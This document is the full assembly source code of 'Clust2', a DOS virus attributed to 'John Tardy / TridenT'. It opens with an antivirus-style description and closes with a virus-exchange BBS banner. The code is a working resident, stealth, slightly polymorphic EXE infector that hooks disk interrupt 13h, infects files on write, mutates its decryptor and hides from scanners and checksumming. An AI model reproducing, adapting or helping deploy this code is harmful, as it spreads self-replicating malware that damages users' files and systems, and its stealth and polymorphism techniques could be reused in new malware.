;
; Clust2 virus by John Tardy / TridenT
;
; Virus Name: Clust2
; Aliases: Cluster-II, Circus Clusters-II
; V Status: Released
; Discovery: Not (yet)
; Symptoms: .EXE altered, possible "sector not found" errors on disk-drives,
; decrease in available memory
; Origin: The Netherlands
; Eff Length: 386 bytes (EXE size doesn't change)
; Type Code: ORhE - Overwriting Resident .EXE Infector
; Detection Method:
; Removal Instructions: Delete infected files or copy infected files with the
; virus resident to a device-driven unit.
;
; General Comments:
; The Clust2 virus is not yet submitted to any antiviral authority. It
; is from the TridenT Virus Research Centre and was written by someone
; calling himself John Tardy. When an infected program is started, Clust2
; will become resident in high memory, but below TOM. It hooks interrupt
; 13h and will try to load the program again. Because of its stealth
; abilities the original program is loaded and will execute normally.
; The Clust2 virus infects files when a write request for interrupt 13h
; is done. It will check if the buffer contains the 'MZ' signature and
; that the candidate file isn't larger than 65000 bytes, and if there are
; enough zeros in the EXE-header. If these conditions are met, Clust2
; will convert the EXE file to a COM file and insert its code in the
; buffer, allowing the original write request to proceed. This way it
; evades critical errors. The Clust2 virus is also stealth and can't be
; detected with virus scanners or checksumming software if the virus is
; resident. File length and date do not change regardless of whether Clust2
; is resident. It is also a slightly polymorphic virus, mutating a few
; bytes in its decryptor. A wildcarded string is needed to find it.
; The following text is encrypted within the
; virus:
;
; "[Clust2]"
; "JT / TridenT"
;
; The Clust2 virus does not infect files on device-driven units, like drives
; compressed with DoubleSpace. It will disinfect when copied to such a
; device.
;
; Sometimes it will issue a "sector not found" error when a file is
; copied to a disk drive.
;
; The Clust2 virus doesn't do anything besides replicating.
;
ORG 100H
JUMPIE: JMP SHORT JUMPER
ORG 180H
JUMPER: CLC
MOV CX,DECRLEN
MORPH EQU $-2
JASS: LEA SI,DECR
DECRYPT: XOR BYTE PTR [SI],0
TRIG EQU $-1
TRAG EQU $-2
TROG: INC SI
TREG: LOOP DECRYPT
DECR: MOV AX,3513H
INT 21H
MOV OLD13,BX
MOV OLD13[2],ES
MOV AX,ES:[BX]
CMP AX,0FC80H
JE EXIT
DOINST: MOV AH,0DH
INT 21H
MOV AX,CS
DEC AX
MOV DS,AX
CMP BYTE PTR DS:[0],'Z'
JNE EXIT
RESIT: SUB WORD PTR DS:[3],VIRPAR+19H
SUB WORD PTR DS:[12H],VIRPAR+19H
LEA SI,JUMPER
MOV DI,SI
MOV ES,DS:[12H]
MOV DS,CS
MOV CX,VIRLEN
REP MOVSB
MOV AX,2513H
MOV DS,ES
LEA DX,NEW13
INT 21H
PUSH CS
POP ES
MOV BX,100H
MOV SP,BX
MOV AH,4AH
INT 21H
PUSH CS
POP DS
MOV BX,DS:[2CH]
MOV ES,BX
MOV AH,49H
INT 21H
XOR AX,AX
MOV DI,1
SEEK: DEC DI
SCASW
JNE SEEK
LEA SI,DS:[DI+2]
EXEC: PUSH BX
PUSH CS
POP DS
MOV BX,OFFSET PARAM
MOV DS:[BX+4],CS
MOV DS:[BX+8],CS
MOV DS:[BX+12],CS
POP DS
PUSH CS
POP ES
MOV DI,OFFSET FILENAME
PUSH DI
MOV CX,40
REP MOVSW
PUSH CS
POP DS
POP DX
MOV AX,4B00H
INT 21H
EXIT: MOV AH,4DH
INT 21H
MOV AH,4CH
INT 21H
OLD13 DW 0,0
ORG13: JMP D CS:[OLD13]
NEW13: CMP AH,3
JE CHECKEXE
CMP AH,2
JNE ORG13
DO: PUSHF
CALL D CS:[OLD13]
CMP ES:[BX],7EEBH
JNE ERROR
MOV ES:[BX],'ZM'
PUSH DI
PUSH CX
PUSH AX
MOV CX,VIRLEN
XOR AX,AX
LEA DI,BX[80H]
REP STOSB
POP AX
POP CX
POP DI
ERROR: IRET
CHECKEXE: CMP ES:[BX],'ZM'
JNE ORG13
CMP W ES:BX[4],(65000/512)
JNB ORG13
PUSH AX
PUSH CX
PUSH SI
PUSH DI
PUSH DS
PUSH ES
POP DS
LEA SI,BX[80H]
MOV DI,SI
MOV CX,VIRLEN
FIND0: LODSB
OR AL,AL
LOOPE FIND0
OR CX,CX
JNE NO0
XOR AX,AX
MOV DS,AX
MOV AX,DS:[046CH]
PUSH CS
POP DS
TEST AH,1
JZ NOLOOPFLIP
XOR B TREG,2
NOLOOPFLIP: TEST AH,2
JZ NOCLCFLIP
XOR B JUMPER,1
NOCLCFLIP:
ADD AX,VIRLEN
SHR AX,1
MOV W MORPH,AX
MOV B TRIG,AH
XOR B TRAG,1
XOR B JASS,1
XOR B TROG,1
MOV CX,CRYPT
LEA SI,JUMPER
REP MOVSB
MOV CX,DECRLEN
LEA SI,DECR
CODEIT: LODSB
XOR AL,AH
STOSB
LOOP CODEIT
MOV DI,BX
MOV AX,07EEBH
STOSW
NO0: POP DS
POP DI
POP SI
POP CX
POP AX
JMP ORG13
DB '[Clust2]'
PARAM DW 0,80H,?,5CH,?,6CH,?
DB 'JT / TridenT'
FILENAME EQU $
DECRLEN EQU $-DECR
CRYPT EQU DECR-JUMPER
VIRLEN EQU $-JUMPER
VIRPAR EQU ($-JUMPER)/16
; =========================================================================
; ===============> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <===============
; ===========> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <===========
; =========================================================================